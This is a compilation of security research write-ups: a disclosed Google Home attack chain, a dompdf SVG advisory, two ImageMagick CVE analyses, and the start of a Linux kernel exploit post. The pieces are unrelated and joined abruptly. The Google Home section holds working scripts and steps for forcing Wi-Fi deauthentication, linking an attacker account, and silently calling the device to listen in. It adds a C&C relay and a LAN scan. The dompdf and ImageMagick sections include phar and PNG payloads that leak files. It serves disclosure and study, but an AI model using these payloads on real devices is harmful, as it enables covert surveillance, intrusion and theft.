While I was reading about CastHack, however, I encountered articles all the way back from 2014 (!) about the “RickMote”, a PoC contraption developed by Dan Petro, security researcher at Bishop Fox, that hijacks nearby Chromecasts and plays “Never Gonna Give You Up” on YouTube. Petro discovered that, when a Chromecast loses its Internet connection, it enters a “setup mode” and creates its own open Wi-Fi network. The intended purpose is to allow the device’s owner to connect to this network from the Google Home app and reset the Wi-Fi settings (in the event that the password was changed, for example). The “RickMote” takes advantage of this behavior.

It turns out that it’s usually really easy to force nearby devices to disconnect from their Wi-Fi network: just send a bunch of “deauth” packets to the target device. WPA2 provides strong encryption for data frames (as long as you choose a good password). However, “management” frames, like deauthentication frames (which tell clients to disconnect) are not encrypted. 802.11w and WPA3 support encrypted management frames, but the Google Home Mini doesn’t support either of these. (Even if it did, the router would need to support them as well for it to work, and this is rare among consumer home routers at this time due to potential compatibility issues. And finally, even if both the device and router supported them, there are still other methods for an attacker to disrupt your Wi-Fi. Basic channel jamming is always an option, though this requires specialized, illegal hardware. Ultimately, Wi-Fi is a poor choice for devices that must be connected to the Internet at all times.)
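
Since these management frames are unauthenticated, forging one takes just a few lines. Here’s a sketch with scapy (the addresses and interface are placeholders, and the interface must be in monitor mode):

from scapy.all import RadioTap, Dot11, Dot11Deauth, sendp  # pip install scapy

ROUTER = "aa:bb:cc:dd:ee:ff"  # BSSID of the victim's AP (placeholder)
TARGET = "e4:f0:42:00:00:00"  # Google Home (Google OUI prefix, placeholder)

# A deauth frame "from" the router telling the Google Home to disconnect.
frame = RadioTap() / Dot11(addr1=TARGET, addr2=ROUTER, addr3=ROUTER) / Dot11Deauth(reason=7)
sendp(frame, iface="wlan0mon", count=100, inter=0.1)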

I wanted to check if this “setup mode” behavior was still in use on the Google Home. I installed aircrack-ng and used the following command to launch a deauth attack:

aireplay-ng --deauth 0 -a [router BSSID] -c [device MAC address] [interface]

My Google Home immediately disconnected from the network and then made its own:

I connected to the network and used netstat to get the router’s IP (the router being the Google Home), and saw that it assigned itself the IP 192.168.255.249. I issued a local API request to see if it would work:

$ curl -s --insecure https://192.168.255.249:8443/setup/eureka_info?params=name,device_info,sign | python3 -m json.tool
{
    "device_info": {
        [...]
        "cloud_device_id": "590C[...]",
        [...]
    },
    "name": "Office speaker",
    "sign": {
        "certificate": "-----BEGIN CERTIFICATE-----\nMIID[...]\n-----END CERTIFICATE-----\n",
        [...]
    }
}

I was shocked to see that it did! With this information, it’s possible to link an account to the device and remotely control it.

A cooler attack scenario

Attacker wishes to spy on victim. Attacker can get within wireless proximity of the Google Home (but does NOT have the victim’s Wi-Fi password).

  1. Attacker discovers victim’s Google Home by listening for MAC addresses with prefixes associated with Google Inc. (e.g. E4:F0:42).
  2. Attacker sends deauth packets to disconnect the device from its network and make it enter setup mode.
  3. Attacker connects to the device’s setup network and requests its device info.
  4. Attacker connects to the Internet and uses the obtained device info to link their account to the victim’s device.

Attacker can now spy on the victim through their Google Home over the Internet (no need to be within proximity of the device anymore).

What else can we do?

Clearly a linked account gives a tremendous amount of control over the device. I wanted to see if there was anything else an attacker could do. We were now accounting for attackers that aren’t already on the victim’s network. Would it be possible to interact with (and potentially attack) the victim’s other devices through the compromised Google Home? We already know that with a linked account you can:

  • Get the local auth token and change device settings through the local API
  • Execute commands on the device remotely through “routines”
  • Install “actions”, which are like sandboxed applications

Earlier I looked into “conversational actions” and determined that these are too sandboxed to be useful as an attacker. But there is another type of action: “smart home actions”. Device manufacturers (e.g. Philips) can use these to add support for their devices to the Google Home platform (e.g. when the user says “turn on the lights”, their Philips Hue light bulbs will receive a “turn on” command).

One thing I found particularly interesting while reading the documentation was the “Local Home SDK”. Smart home actions used to only run through the Internet (like conversational actions), but Google had recently (April 2020) introduced support for running these locally, improving latency.

The SDK lets you write a local fulfillment app, using TypeScript or JavaScript, that contains your smart home business logic. Google Home or Google Nest devices can load and run your app on-device. Your app communicates directly with your existing smart devices over Wi-Fi on a local area network (LAN) to fulfill user commands, over existing protocols.

Sounded promising. I looked into how it works though and it turns out that these local home apps don’t have direct LAN access. You can’t just connect to any IP you want; rather, you need to specify a “scan configuration” using mDNS, UPnP or UDP broadcast. The Google Home scans the network on your behalf, and if any matching devices are found, it will return a JavaScript object that allows your app to interact with the device over TCP/UDP/HTTP.

Is there any way around this? I noticed that the docs said something about debugging using Chrome DevTools. It turns out that when a local home app is running in testing mode (deployed to the developer’s own account), the Google Home opens port 9222 for the Chrome DevTools Protocol (CDP). CDP access provides complete control over the Chrome instance. For example, you can open or close tabs, and intercept network requests. That got me thinking, maybe I could provide a scan configuration that instructs the Google Home to scan for itself, so I would be able to connect to CDP, take control of the Chrome instance running on the device, and use it to make arbitrary requests within the LAN.

I created a local home app using my linked account and set up the scan config to search for the _googlecast._tcp.local mDNS service. I rebooted the device, and the app loaded automatically. It quickly found itself, and I was able to issue HTTP requests to localhost!

CDP uses WebSockets, which can be accessed through the standard JS API. The same-origin policy doesn’t apply to WebSockets, so we can easily initiate a WebSocket to localhost from our local home app (hosted on some public website) without any problems, as long as we have the correct URL. Because CDP access could lead to trivial RCE on the desktop version of Chrome, the WebSocket address is randomly generated each time debugging is enabled, to prevent random websites from connecting. The address can be retrieved through a GET request to http://[CDP host]:9222/json. This is normally protected by the same-origin policy, so we can’t just use an XHR request, but since we have full access to localhost through the Local Home SDK, we can use that to make the request. Once we have the address, we can use the JS WebSocket() constructor to connect.
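
For illustration, here’s the same two-step dance from Python on the LAN; the real exploit performs it in JavaScript from the local home app, against localhost:

import json
import requests
import websocket  # pip install websocket-client

CDP = "192.168.86.29:9222"  # the device's CDP port, for illustration

# Step 1: the randomized WebSocket address is advertised at /json.
target = requests.get(f"http://{CDP}/json").json()[0]
ws_url = target["webSocketDebuggerUrl"]

# Step 2: connect and drive the browser with raw CDP messages.
ws = websocket.create_connection(ws_url)
ws.send(json.dumps({"id": 1, "method": "Page.navigate",
                    "params": {"url": "http://192.168.86.1/"}}))  # any LAN URL
print(ws.recv())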

Through CDP, we can send arbitrary HTTP requests within the victim’s LAN, which opens up the victim’s other devices for attack. As I describe later, I also found a way to read and write arbitrary files on the device using CDP.

PoCs

The following PoCs have been published here: https://github.com/DownrightNifty/gh_hack_PoC

Since the security issues have been fixed, none of these probably work anymore, but I thought they were worth documenting/preserving.

PoC #1: Spy on victim

I made a PoC that works on my Android phone (via Python on Termux) to demonstrate how quick and easy the process of linking an account could be. The attack described here could be performed within the span of a few minutes.

For the PoC, I re-implemented the device link and routines APIs in Python, and made the following utilities: google_login.py, link_device.py, reset_volume.py, and call_device.py.

  1. Download protoc and add it to your PATH
  2. Install the requirements: pip3 install requests==2.23.0 gpsoauth httpx[http2]
  3. Create the “attacker” Google account
  4. Log in with python3 google_login.py
  5. Get within wireless proximity of Google Home
  6. Deauth the Google Home
    • Raw packet injection (required for deauth attacks) requires a rooted phone and won’t work on some Wi-Fi chips. I ended up using a NodeMCU, a tiny Wi-Fi development board going for less than $5 on Amazon, and flashed it with spacehuhn’s deauther firmware. You can use its web UI to scan for nearby devices and deauth them. It quickly found my Google Home (manufacturer listed as “Google” based on MAC address prefix) and I was able to deauth it.
  7. Connect to the Google Home’s setup network (named [device name].o)
  8. Run python3 link_device.py --setup_mode 192.168.255.249 to link your account to the device
    • In addition to linking your account, to make the attack as stealthy as possible, “night mode” is also enabled on the device, which decreases the maximum volume and LED brightness. Since music volume is unaffected, and the volume decrease is almost entirely suppressed when the volume is greater than 50%, this subtle change is unlikely to be noticed by the victim. However, it makes it so that, at 0% volume, the Assistant voice is completely muted (whereas with night mode off, it can barely still be heard at 0%).
  9. Stop the deauth attack and wait for the device to re-connect to the Internet
    • You can run python3 reset_volume.py 4 to reset the volume to 40% (since enabling night mode set it to 0%).
  10. Now that your account is linked, you can make the device call your phone number, silently, at any time, over the Internet, allowing you to listen in to the microphone feed.
    • To issue a call, run python3 call_device.py [phone number].
    • The commands “set the volume to 0” and “call [number]” are executed on the device remotely using a routine.
    • The only thing the victim may notice is that the device’s LEDs turn solid blue, but they’d probably just assume it’s updating the firmware or something. In fact, the official support page describing what the LED colors mean only says solid blue means “Your speaker needs to be verified by you” and makes no mention of calling. During a call, the LEDs do not pulse like they normally do when the device is listening, so there is no indication that the microphone is open.

Here’s a video demonstrating what it looks like when a call is initiated remotely:

As you can see, there is no audible indication that the commands are running, which makes it difficult for the victim to notice. The victim can still use their device normally for the most part (although certain commands, like music playback, don’t work during a call).

PoC #2: Make arbitrary HTTP requests on victim’s network

As I described earlier, the attacker can install a smart home action onto the linked device remotely, and leverage the Local Home SDK to make arbitrary HTTP requests within the victim’s LAN. c2.py is the command & control server; app.js and index.html are the local home app.

  1. Configure and start the C&C server:
    • Install the requirements: pip3 install mitmproxy websockets
    • Start the server: mitmdump --listen-port 8000 --set upstream_cert=false --ssl-insecure -s c2.py
      • Under the default configuration, a proxy server starts on localhost:8000, and a WebSocket server starts on 0.0.0.0:9000. The proxy server acts as a relay, sending requests from programs on your computer (like curl) to the victim’s Google Home through the WebSocket. In a real attack, the WebSocket port would need to be exposed to the Internet so the victim’s Google Home could connect to it, but for local demonstration, it doesn’t have to be.
  2. Configure the local home app:
    • Change the C2_WS_URL variable at the top of app.js to the WebSocket URL for your C&C server. This needs to be reachable by the Google Home.
    • Host the static index.html and app.js files somewhere reachable by the Google Home. For local demonstration, you can spin up a simple file hosting server using python3 -m http.server.
  3. Deploy the local home app to your account:
npm run firebase --prefix functions/ -- functions:config:set \
    strand1.leds=16 strand1.channel=1 \
    strand1.control_protocol=HTTP
npm run deploy --prefix functions/
    • This tells the cloud fulfillment to include an otherDeviceIds field in responses to SYNC requests. As far as I understand, this is all that’s required to activate local fulfillment; the specific device IDs or attributes you choose don’t matter.
  4. Get within wireless proximity of the victim’s Google Home, then force it into setup mode, and link your account using the link_device.py script from PoC #1.
  5. Reboot the device:
    • While still connected to the device’s setup network, send a POST request to the /reboot endpoint with the body {"params":"now"} and a cast-local-authorization-token header (obtained with HomeGraphAPI.get_local_auth_tokens() from googleapi.py).
    • For local demonstration, you can just unplug the Google Home then plug it back in.
  6. Not long after the reboot, the Google Home automatically downloads your local home app and runs it.
    • The app waits for the IDENTIFY request it receives when the Google Home finds itself through mDNS scanning, then connects to the Chrome DevTools Protocol WebSocket on port 9222. After connecting to CDP, it opens a WebSocket to your C&C server and waits for commands. If disconnected from either CDP or the C&C server, it automatically tries to reconnect every 5 seconds.
    • Once loaded, it seems to run indefinitely. The documentation says apps may be killed if they consume too much memory, but I haven’t run into this, and I’ve even left my app running overnight. If the Google Home is rebooted, the app will reload.
Now, you can send HTTP(S) requests on the victim’s private LAN, as if you had the WiFi password, even though you don’t (yet), by configuring a program on your computer to route its traffic through the local proxy server, which in turn routes it to the Google Home. For example, curl --proxy 'localhost:8000' --insecure -v https://localhost:8443/setup/eureka_info returns the Google Home’s info, because through the proxy, localhost resolves to the Google Home’s IP. The JSON response to /setup/eureka_info contains the IP, which is helpful for determining the layout of the LAN.

I was even able to route Chrome through the proxy, with chrome --proxy-server='localhost:8000' --ignore-certificate-errors --user-data-dir='SOME_DIR', and it worked surprisingly well.

Obviously, the ability to send requests on the private LAN opens a large attack surface. Using the IP of the Google Home, you can determine the subnet that the victim’s other devices are on. For example, my Google Home’s IP is 192.168.86.132, so I could guess that my other devices are in the 192.168.86.0 to 192.168.86.255 range. You could write a simple script to curl every possible address, looking for devices on the LAN to attack or steal data from. Since it only takes a few seconds to check each IP, it would only take around 10 minutes to try every one. On my LAN, I found my printer’s web interface at http://192.168.86.33. Its network settings page contains an <input type="password"> pre-filled with my WiFi password in plaintext. It also provides a firmware update mechanism, which I imagine could be vulnerable to attack.
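
The scan script can be as simple as this sketch, which sweeps the /24 through the PoC’s proxy relay:

import requests  # pip install requests

# Route everything through the mitmdump relay from this PoC, which forwards
# requests to the victim's Google Home over the C&C WebSocket.
PROXIES = {"http": "http://localhost:8000", "https": "http://localhost:8000"}

for i in range(1, 255):
    ip = f"192.168.86.{i}"
    try:
        r = requests.get(f"http://{ip}/", proxies=PROXIES, timeout=5)
        print(ip, r.status_code, r.headers.get("Server", ""))
    except requests.RequestException:
        pass  # host down or not speaking HTTP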

Another approach would be looking for the victim’s router and trying to attack that. My router’s IP, 192.168.1.254, shows up among the first results when you Google “default router IPs”. You could write a script to try these. My router’s configuration interface also immediately returns my WiFi password in plaintext. Luckily, I’ve changed the default admin password, so at the very least an attacker with access to it wouldn’t be able to modify the settings, but most people don’t change this password, so you could find it by searching for “[brand name] router password”, then set the DNS server to your own, install malicious firmware updates, etc. Even if the victim changed their router’s password, it may still be vulnerable. For example, in June 2020, a researcher found a buffer overflow vulnerability in the web interface on 79 Netgear router models that led to a root shell, and described the process as “easy”.

PoC #3: Read/write arbitrary files on device

I also found a way to read/write arbitrary files on the linked device using the DOM.setFileInputFiles and Page.setDownloadBehavior methods of the Chrome DevTools Protocol.
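
The core CDP messages that write.js and read.js send look roughly like this (a sketch; the node ID and paths are illustrative):

import json

# Write: let Chrome "download" a file served by the attacker into a chosen
# directory on the device.
write_msg = {"id": 1, "method": "Page.setDownloadBehavior",
             "params": {"behavior": "allow", "downloadPath": "/tmp"}}

# Read: attach an on-device file to a file <input> on an attacker-controlled
# page, which then uploads it to the read server.
read_msg = {"id": 2, "method": "DOM.setFileInputFiles",
            "params": {"nodeId": 4, "files": ["/tmp/example_file.txt"]}}

print(json.dumps(write_msg))
print(json.dumps(read_msg))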

The following reproduction steps first write a file, /tmp/example_file.txt, then read it back to verify that it worked.

  1. Enable remote debugging on the Google Home (port 9222 opens when a local home app is deployed in testing mode, as in PoC #2)
  2. Install the requirements:
npm install ws
pip install flask
  3. Create an example_file.txt, e.g. echo 'test' > example_file.txt
  4. Run python3 write_server.py example_file.txt. You can optionally modify the HOST or PORT variables at the top of the script. Get the URL of the server, like http://[IP]:[port]. This must be reachable by the Google Home.
  5. Run node write.js [Google Home IP] [write server URL] /tmp, inserting the appropriate values. You can get the Google Home’s IP from the Google Home app. The file will be written to /tmp/example_file.txt.
  6. Run python3 read_server.py. You can modify the host/port like before.
  7. Run node read.js [Google Home IP] [read server URL]. When prompted for a file path to read, enter /tmp/example_file.txt.
  8. Verify that example_file.txt was dumped from the device to dumped_files/example_file.txt

Since I couldn’t explore the filesystem of my Google Home (and <input type="file" webkitdirectory> didn’t work to upload folders instead of files), I’m not sure exactly what the impact of this was. I was able to find some info about the filesystem structure from the “open source licenses” info, and from the DEFCON talk on the Google Home. I dumped a few binaries like /system/chrome/cast_shell and /system/chrome/lib/libassistant.so, then ran strings on them, looking for interesting files to steal or tamper with. It looks like /data/chrome/chirp/assistant/cookie may contain user info. /data/chrome/chirp/assistant/settings and /data/chrome/chirp/assistant/phenotype_package_store both contain the GAIA IDs of the accounts linked to my Google Home. I was able to dump /data/chrome/chirp/assistant/nightmode/nightmode_params, hex edit it, and overwrite the original with my modified version, and the changes were applied after a reboot. If, for example, a bug in a config file parser was found, I imagine that this could have potentially led to RCE.

The fixes

I’m aware of the following fixes deployed by Google:

  • You must request an invite to the “Home” that the device is registered to in order to link your account to it through the /deviceuserlinksbatch API. If you’re not added to the Home but you try to link your account this way, you’ll get a PERMISSION_DENIED error.
  • “Call [phone number]” commands can’t be initiated remotely through routines.

You can still deauth the Google Home and access its device info through the /setup/eureka_info endpoint, but you can’t use it to link your account anymore, and you can’t access the rest of the local API (because you can’t get a local auth token).

On devices with a display (e.g. Google Nest Hub), the setup network is protected with a WPA2 password that appears as a QR code on the display (scanned with the Google Home app), adding an additional layer of protection.

Additionally, on these devices, you can say “add my voice” to bring up a screen with a link code instructing you to visit https://g.co/nest/voice. You can link your account to the device through this website, even if you aren’t added to its Home (which is fine, because this still requires physical access to the device). The “add my voice” command doesn’t appear to work on the Google Home Mini, probably since it doesn’t have a display that it can use to provide a link code. I guess if Google wanted to implement this, they could make it speak the link code out loud or text it to a provided phone number or something.

Reflection/conclusions

Google Home’s architecture is based on Chromecast. Chromecast doesn’t place much emphasis on security against proximity-based attacks because it’s mostly unnecessary. What’s the worst that could happen if someone hacks your Chromecast? Maybe they could play obscene videos? However, the Google Home is a much more security-critical device, due to the fact that it has control over your other smart home devices, and a microphone. If the Google Home architecture had been built from scratch, I imagine that these issues would have never existed.

Ever since the first Google Home device was released in November 2016, Google has continued to add more and more features to the device’s cloud APIs, like scheduled routines (July 2018) and the Local Home SDK (April 2020). I’m guessing that the engineers behind these features were under the assumption that the account linking process was secure.

Many other security researchers had already given the Google Home a look before me, but somehow it appears that none of them noticed these seemingly glaring issues. I guess they were mainly focused on the endpoints that the local API exposed and what an attacker could do with those. However, these endpoints only allow for adjusting a few basic device settings, and not much else. While the issues I discovered may seem obvious in hindsight, I think that they were actually pretty subtle. Rather than making a local API request to control the device, you instead make a local API request to retrieve innocuous-looking device info, and use that info along with cloud APIs to control the device.

As the DEFCON talk shows, the low-level security of the device is generally pretty good, and buffer overflows and such are hard to come by. The issues I found were lurking at the high level.

Many thanks to Google for the incredibly generous rewards!

Disclosure timeline

  • 01/08/2021: Reported
  • 01/10/2021: Triaged
  • 01/20/2021: Closed (Intended Behavior)
  • I was busy with school stuff, so it took me a while to respond
  • 03/11/2021: Sent additional details and PoC
  • 03/19/2021: Reopened
  • 04/07/2021: Sent additional details
  • 04/20/2021: Reward received
  • 04/05/2022: Google announced increased rewards for Google Nest and Fitbit devices
  • 05/04/2022: Bonus rewards received

Prior research

Here are some articles I found during my research on Google Home devices that I thought were interesting:

Footnote: Static analysis of Google Home app

During my research, I did a little digging within the Google Home app. I didn’t find any security issues here, but I did discover some things about the local API that the unofficial docs don’t yet include.

show_led endpoint

To find a list of local API endpoints (and potentially some undocumented ones), I searched for a known endpoint (get_app_device_id) in the decompiled sources:

The information I was looking for was in defpackage/ufo.java:

SHOW_LED sounded interesting, and it wasn’t in the unofficial docs. Searching for where this constant is used led me to StereoPairCreationActivity:

With the help of JADX’s amazing “rename symbol” feature, and after renaming some methods, I was able to find the class responsible for constructing the JSON payload for this endpoint:

Looks like the payload consists of an integer animation_id. We can use the endpoint like so:

$ curl --insecure -X POST -H 'cast-local-authorization-token: [token]' -H 'Content-Type: application/json' -d '{"animation_id":2}' https://[Google Home IP]:8443/setup/assistant/show_led

This makes the LEDs play a slow pulsing animation. Unfortunately it seems that there are only two animations: 1 (reset LEDs to normal) and 2 (continuous pulsing). Oh, well.

Wi-Fi password encryption

I was also able to find the algorithm used to encrypt the user’s Wi-Fi password before sending it through the /setup/connect_wifi endpoint. Now that HTTPS is used, this encryption seems redundant, but I imagine that this was originally implemented to protect against MITM attacks exposing the Wi-Fi password. Anyway, we see that the password is encrypted using RSA PKCS1 and the device’s public key (from /setup/eureka_info):
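For illustration, here is a minimal sketch of that scheme in Python (my reconstruction; the PEM key format and the helper name are assumptions, since the exact encoding of the key returned by /setup/eureka_info isn’t shown here):

import base64
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives.serialization import load_pem_public_key

def encrypt_wifi_password(password, device_public_key_pem):
    """RSA PKCS#1 v1.5 encryption of the Wi-Fi password, base64-encoded
    so it can be embedded in the body of /setup/connect_wifi."""
    public_key = load_pem_public_key(device_public_key_pem)
    ciphertext = public_key.encrypt(password.encode(), padding.PKCS1v15())
    return base64.b64encode(ciphertext).decode()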

Footnote: Deauth attacks on Google Home Mini

I mentioned above that the Google Home Mini doesn’t support WPA3 or 802.11w. I’d like to clarify how I discovered this.

Since my router doesn’t support these, I borrowed a friend’s router running OpenWrt, a FOSS operating system for routers, which does support 802.11w and WPA3.

There are three 802.11w modes you can choose from: disabled (default), optional, and required. (“Optional” means that it’s used only for devices that support it.) While I was using “required”, my Google Home Mini was unable to connect, while my Pixel 5 (Android 12) and MacBook Pro (macOS 12.4) had no issues; I got the same results when I enabled WPA3. With “optional”, the Google Home Mini connected, but it was still vulnerable to deauth attacks (as expected).

I tested this on the latest Google Home Mini firmware at the time of writing (1.56.309385, August 2022), on 1st gen (codename mushroom) hardware. I’m assuming this is a limitation of the Wi-Fi chip that it uses, rather than a software issue.

Dompdf vulnerable to URI validation failure on SVG parsing

Original text by Blaklis

Summary

The URI validation on dompdf 2.0.1 can be bypassed on SVG parsing by passing <image> tags with uppercase letters. This might lead to arbitrary object unserialization on PHP < 8, through the phar URL wrapper.

Details

The bug occurs during SVG parsing of <image> tags, in src/Image/Cache.php:

if ($type === "svg") {
    $parser = xml_parser_create("utf-8");
    xml_parser_set_option($parser, XML_OPTION_CASE_FOLDING, false);
    xml_set_element_handler(
        $parser,
        function ($parser, $name, $attributes) use ($options, $parsed_url, $full_url) {
            if ($name === "image") {
                $attributes = array_change_key_case($attributes, CASE_LOWER);

This part will try to detect <image> tags in the SVG, and will take the href to validate it against the protocolAllowed whitelist. However, the $name comparison with "image" is case sensitive, which means that such a tag in the SVG will pass:

<svg>
    <Image xlink:href="phar:///foo"></Image>
</svg>

Because the tag is named "Image" rather than "image", it never matches the condition, so the href check is never triggered.

A correct solution would be to strtolower() the $name before the check:

if (strtolower($name) === "image") {

PoC

Parsing the following SVG file is sufficient to reproduce the vulnerability :

<svg>
    <Image xlink:href="phar:///foo"></Image>
</svg>

Impact

An attacker might be able to exploit the vulnerability to call arbitrary URLs with arbitrary protocols, if they can provide an SVG file to dompdf. On PHP versions before 8.0.0, this leads to arbitrary unserialization via the phar URL wrapper, which results at the very least in arbitrary file deletion and might lead to remote code execution, depending on the classes available.


ImageMagick: The hidden vulnerability behind your online images

ImageMagick: The hidden vulnerability behind your online images

Original text by Bryan Gonzalez (Ocelot Team, Metabase Q)

Introduction

ImageMagick is a free and open-source software suite for displaying, converting, and editing image files. It can read and write over 200 image file formats, and it is therefore very common to find it on websites worldwide, since there is always a need to process pictures for users’ profiles, catalogs, etc.

In a recent APT Simulation engagement, the Ocelot team identified that ImageMagick was used to process images in a Drupal-based website, and hence, the team decided to try to find new vulnerabilities in this component, proceeding to download the latest version of ImageMagick, 7.1.0-49 at that time. As a result, two zero days were identified:

  • CVE-2022-44267: ImageMagick 7.1.0-49 is vulnerable to Denial of Service. When it parses a PNG image (e.g., for resize), the convert process could be left waiting for stdin input.
  • CVE-2022-44268: ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the content of an arbitrary remote file (if the ImageMagick binary has permissions to read it).

How to trigger the exploitation?

An attacker needs to upload a malicious image to a website that uses ImageMagick in order to exploit the above-mentioned vulnerabilities remotely.

The Ocelot team is very grateful for the team of volunteers of ImageMagick, who validated and released the patches needed in a timely manner:

https://github.com/ImageMagick/ImageMagick/commit/05673e63c919e61ffa1107804d1138c46547a475

In this blog, the technical details of the vulnerabilities are explained.

CVE-2022-44267: Denial of service

ImageMagick:  7.1.0-49

When ImageMagick parses a PNG file, for example in a resize operation, the convert process could be left waiting for stdin input, leading to a Denial of Service since the process won’t be able to process other images.

A malicious actor could craft a PNG or use an existing one and add a textual chunk type (e.g., tEXt). These chunks have a keyword and a text string. If the keyword is the string “profile” (without quotes), ImageMagick interprets the text string as a filename and loads its content as a raw profile. If the specified filename is “-” (a single dash), ImageMagick will try to read the content from standard input, potentially leaving the process waiting forever.

Exploitation Path Execution:

  • Upload an image to trigger an ImageMagick command, like convert
  • ReadOnePNGImage (coders/png.c:2164): reading the “tEXt” chunk
  • SetImageProfile (MagickCore/property.c:4360): checking if the keyword equals “profile”, copying the text string as the filename in line 4720 and saving the content in line 4722
  • FileToStringInfo stores the content into string_info->datum (MagickCore/string.c:1005):
MagickExport StringInfo *FileToStringInfo(const char *filename,
  const size_t extent,ExceptionInfo *exception)
{
  StringInfo
    *string_info;

  assert(filename != (const char *) NULL);
  assert(exception != (ExceptionInfo *) NULL);
  if (IsEventLogging() != MagickFalse)
    (void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",filename);
  string_info=AcquireStringInfoContainer();
  string_info->path=ConstantString(filename);
  string_info->datum=(unsigned char *) FileToBlob(filename,extent,
    &string_info->length,exception);
  if (string_info->datum == (unsigned char *) NULL)
    {
      string_info=DestroyStringInfo(string_info);
      return((StringInfo *) NULL);
    }
  return(string_info);
}

FileToBlob (MagickCore/blob.c:1396): a filename of “-” is mapped to stdin, causing the process to wait for input forever:

  file=fileno(stdin);
  if (LocaleCompare(filename,"-") != 0)
    {
      status=GetPathAttributes(filename,&attributes);
      if ((status == MagickFalse) || (S_ISDIR(attributes.st_mode) != 0))
        {
          ThrowFileException(exception,BlobError,"UnableToReadBlob",filename);
          return(NULL);
        }
      file=open_utf8(filename,O_RDONLY | O_BINARY,0);
    }
  if (file == -1)
    {
      ThrowFileException(exception,BlobError,"UnableToOpenFile",filename);
      return(NULL);
    }
  offset=(MagickOffsetType) lseek(file,0,SEEK_END);
  count=0;
  if ((file == fileno(stdin)) || (offset < 0) ||
      (offset != (MagickOffsetType) ((ssize_t) offset)))
    {
      size_t
        quantum;

      struct stat
        file_stats;

      /*
        Stream is not seekable.
      */
      offset=(MagickOffsetType) lseek(file,0,SEEK_SET);
      quantum=(size_t) MagickMaxBufferExtent;
      if ((fstat(file,&file_stats) == 0) && (file_stats.st_size > 0))
        quantum=(size_t) MagickMin(file_stats.st_size,MagickMaxBufferExtent);
      blob=(unsigned char *) AcquireQuantumMemory(quantum,sizeof(*blob));
      for (i=0; blob != (unsigned char *) NULL; i+=count)
      {
        count=read(file,blob+i,quantum);

PoC: Malicious PNG File:

89504E470D0A1A0A0000000D49484452000000010000000108000000003A7E9B550000000B49444154789C63F8FF1F00030001FFFC25DC510000000A7445587470726F66696C65002D00600C56A10000000049454E44AE426082
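The hex blob above decodes to a tiny PNG carrying a tEXt chunk with the keyword “profile” and the text “-”. As a sketch (my own reconstruction, not the Ocelot tooling), an equivalent PoC can be generated with a few lines of Python; changing the text string to a file path yields the CVE-2022-44268 variant shown later:

import struct
import zlib

def png_chunk(chunk_type, data):
    """length + type + data + CRC32(type + data), per the PNG spec."""
    return (struct.pack(">I", len(data)) + chunk_type + data +
            struct.pack(">I", zlib.crc32(chunk_type + data)))

def build_poc(text):
    sig = b"\x89PNG\r\n\x1a\n"
    # Minimal 1x1 grayscale image, bit depth 8
    ihdr = png_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
    idat = png_chunk(b"IDAT", zlib.compress(b"\x00\x00"))  # filter + pixel
    text_chunk = png_chunk(b"tEXt", b"profile\x00" + text)  # keyword NUL text
    iend = png_chunk(b"IEND", b"")
    return sig + ihdr + idat + text_chunk + iend

with open("poc_dos.png", "wb") as f:
    f.write(build_poc(b"-"))            # CVE-2022-44267: hang on stdin
with open("poc_leak.png", "wb") as f:
    f.write(build_poc(b"/etc/passwd"))  # CVE-2022-44268: embed file content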

Evidence: Malicious image file: OCELOT_output.png

Stdin input waiting forever:

CVE-2022-44268: Arbitrary Remote Leak

ImageMagick:  7.1.0-49

When ImageMagick parses the PNG file, for example in a resize operation, the resulting image could have embedded the content of an arbitrary remote file from the website (if the magick binary has permission to read it).

A malicious actor could craft a PNG or use an existing one and add a textual chunk type (e.g., tEXt). These chunks have a keyword and a text string. If the keyword is the string “profile” (without quotes), ImageMagick interprets the text string as a filename and loads its content as a raw profile; the attacker can then download the resized image, which will contain the content of the remote file.

Exploitation Path Execution:

  • Upload an image to trigger an ImageMagick command, like convert
  • ReadOnePNGImage (coders/png.c:2164): reading the tEXt chunk
  • SetImageProfile (MagickCore/property.c:4360): checking if the keyword equals “profile”, copying the text string as the filename in line 4720 and saving the content in line 4722
  • FileToStringInfo stores the content into string_info->datum (MagickCore/string.c:1005):

If a valid (and accessible) filename is provided, the content will be returned to the caller function (FileToStringInfo) and the StringInfo object will return to the SetImageProperty function, saving the blob into the new image generated, thanks to the function SetImageProfile:

This new image will be available to download by the attackers with the arbitrary website file content embedded inside.

PoC: Malicious PNG content to leak “/etc/passwd” file:

89504E470D0A1A0A0000000D4948445200000001000000010100000000376EF9240000000A49444154789C636800000082008177CD72B6000000147445587470726F66696C65002F6574632F70617373776400B7F46D9C0000000049454E44AE426082

Evidence:

Content of the /etc/passwd stored in the image via profile->datum variable:

Hexadecimal representation of the /etc/passwd content, extracted from the image:

Content from /etc/passwd in the website, received in the image generated:


Linux Kernel: Exploiting a Netfilter Use-after-Free in kmalloc-cg

Linux Kernel: Exploiting a Netfilter Use-after-Free in kmalloc-cg

Original text by Sergi Martinez

Overview

It’s been a while since our last technical blogpost, so here’s one right on time for the Christmas holidays. We describe a method to exploit a use-after-free in the Linux kernel when objects are allocated in a specific slab cache, namely the kmalloc-cg series of SLUB caches used for cgroups. This vulnerability is assigned CVE-2022-32250 and exists in Linux kernel versions 5.18.1 and prior.

The use-after-free vulnerability in the Linux kernel netfilter subsystem was discovered by NCC Group’s Exploit Development Group (EDG). They published a very detailed write-up with an in-depth analysis of the vulnerability and an exploitation strategy that targeted Linux kernel version 5.13. Additionally, Theori published their own analysis and exploitation strategy, this time targeting Linux kernel version 5.15. We strongly recommend having a thorough read of both articles to better understand the vulnerability prior to reading this post, which almost exclusively focuses on an exploitation strategy that works on the latest vulnerable version of the Linux kernel, version 5.18.1.

The aforementioned exploitation strategies are different from each other and from the one detailed here since the targeted kernel versions have different peculiarities. In version 5.13, allocations performed with either the GFP_KERNEL flag or the GFP_KERNEL_ACCOUNT flag are served by the kmalloc-* slab caches. In version 5.15, allocations performed with the GFP_KERNEL_ACCOUNT flag are served by the kmalloc-cg-* slab caches. While in both 5.13 and 5.15 the affected object, nft_expr, is allocated using GFP_KERNEL, the difference in exploitation between them arises because a commonly used heap spraying object, the System V message structure (struct msg_msg), is served from kmalloc-* in 5.13 but from kmalloc-cg-* in 5.15. Therefore, in 5.15, struct msg_msg cannot be used to exploit this vulnerability.

